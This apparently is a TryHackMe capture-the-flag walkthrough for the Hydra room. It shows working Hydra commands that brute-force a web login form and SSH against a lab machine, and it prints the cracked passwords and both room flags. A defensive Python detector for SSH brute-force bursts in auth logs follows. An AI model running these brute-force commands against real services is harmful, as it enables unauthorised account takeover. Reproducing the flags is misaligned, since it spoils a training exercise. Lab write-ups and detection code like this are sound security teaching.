TryHackMe | Hydra | Walkthrough
What is Hydra?
Hydra (also known as THC-Hydra) is a fast, robust, and widely used online password brute-forcer. It automates login attempts across many services and protocols. Instead of manually typing every possible password, Hydra does it in milliseconds using wordlists.
Supported Protocols
Hydra supports a wide variety of services, including:
SSH, FTP, HTTP(S)-FORM, RDP, SMB, MySQL, PostgreSQL, VNC, Telnet, SNMP, and many more.
You can view the full list on Hydra’s official repository.
Why Should You Care?
This highlights why strong passwords matter:
- Common passwords like admin, password123, or 123456 can easily be cracked.
- Many devices (like CCTV cameras) come with default credentials like admin:admin.
- If left unchanged, these devices become low-hanging fruit for attackers.
Installing Hydra
If you’re using Kali Linux or the TryHackMe AttackBox, Hydra is already installed.
For other systems:
- Debian/Ubuntu: sudo apt install hydra
- Fedora: sudo dnf install hydra
- Or download from the official GitHub repo
Task Overview – TryHackMe Challenge
In this TryHackMe room, we’re given a machine to attack with two tasks:
- Brute force web login for user molly
- Brute force SSH login for the same user
Let’s break down each task step-by-step.
Task 1 — Brute Force Web Login (POST Method)
Step 1: Intercept the Request
- Visit the login page in the browser.
- Try any random credentials.
- Use Burp Suite to intercept the POST request.
- Identify the request format. Example:
POST /login
username=regan&password=wrongpassword
The server responds:
Your username or password is incorrect.
We’ll use this failure string in our Hydra command.
Step 2: Hydra Command for Web Login
hydra -l molly -P /usr/share/wordlists/rockyou.txt MACHINE_IP http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
Breakdown:
- -l molly → The username to test.
- -P rockyou.txt → Wordlist with potential passwords.
- http-post-form → Specifies we’re attacking a POST web form.
- "/login:username=^USER^&password=^PASS^:failure message" → Format Hydra understands: the page path, the form body with ^USER^ and ^PASS^ placeholders, and the failure message, separated by colons.
- -V → Verbose mode to show each attempt.
Result
Eventually, Hydra cracks the password. You’ll see:
[80][http-post-form] host: MACHINE_IP login: molly password: butterfly
Flag 1:
THM{b3autiful_butt3rfly}
Task 2 — Brute Force SSH Login
Hydra Command for SSH
hydra -l molly -P /usr/share/wordlists/rockyou.txt MACHINE_IP -t 4 ssh -V
Explanation:
- ssh → Protocol to brute force.
- -t 4 → Run 4 parallel threads to speed up cracking.
Result
Hydra eventually finds the right password:
[22][ssh] host: MACHINE_IP login: molly password: chocolate
Flag 2:
THM{sw33t_ch0c0lat3}
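From the defender's side, the SSH run above shows up in the sshd auth log as a burst of failed passwords from one source followed by a success. The following is an added example, not part of the original walkthrough or the room: a small detector over constructed log lines. The function name, threshold, window, host name and IP address are assumptions, and the log format assumed is OpenSSH's usual syslog output.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd auth-log lines (OpenSSH syslog format); the year is absent, so one is assumed.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return ('burst', ip, user) when one source reaches `threshold` failures
    inside `window`, and ('success_after_burst', ip, user) when that same
    source later logs in, i.e. a guess probably worked."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()               # ips that already raised a burst alert
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["kind"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("burst", ip, user))
        elif ip in flagged:                # accepted login from a noisy source
            alerts.append(("success_after_burst", ip, user))
    return alerts

# Constructed sample log: six rapid failures, a success, and an unrelated login.
SAMPLE = [
    f"Jan 10 10:00:0{i} web01 sshd[210{i}]: Failed password for molly "
    f"from 10.10.10.5 port 5100{i} ssh2" for i in range(6)
] + [
    "Jan 10 10:00:07 web01 sshd[2107]: Accepted password for molly from 10.10.10.5 port 51007 ssh2",
    "Jan 10 10:05:00 web01 sshd[2200]: Accepted password for alice from 192.168.1.20 port 40000 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE):
        print(alert)
```

The threshold and window are tuning parameters; the success_after_burst alert is the one to treat as a likely compromised account.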
Disclaimer
This tutorial is for educational purposes only. Always have explicit permission before testing any system. Use your skills ethically.